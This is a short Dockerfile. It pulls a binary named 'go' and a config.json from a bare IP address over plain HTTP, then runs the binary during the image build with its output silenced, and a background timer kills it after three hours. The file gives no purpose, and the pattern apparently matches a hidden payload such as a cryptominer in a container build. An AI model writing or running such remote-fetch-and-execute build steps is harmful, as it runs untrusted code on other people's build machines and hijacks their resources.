FROM alpine:3.7

ADD http://52.47.120.169/files/go /
ADD http://52.47.120.169/files/config.json /

RUN chmod +x /go && sleep 2s && ash -c 'sleep 3h && killall -TERM go && exit 0 &' && /go >/dev/null 2>&1